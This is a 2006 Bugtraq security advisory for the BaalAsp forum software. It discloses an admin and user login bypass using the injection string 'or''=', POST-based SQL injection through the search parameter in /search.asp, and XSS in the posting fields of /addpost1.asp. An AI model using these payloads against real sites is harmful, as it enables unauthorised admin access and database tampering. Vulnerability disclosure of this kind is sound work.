[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061115174425.10838.qmail@securityfocus.com>
Date: 15 Nov 2006 17:44:25 -0000
From: saps.audit@...il.com
To: bugtraq@...urityfocus.com
Subject: BaalAsp forum [login bypass ,injections sql(post), xss(post)]
vendor site:http://baalasp.com/
product:BaalAsp forum
bug:login bypass, injection sql post, xss post
risk:high
authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='
injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine
xss post :
/addpost1.asp?
vulnerables fields :
- Subject:
- Group Name:
- Message:
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@...il.com
Powered by blists - more mailing lists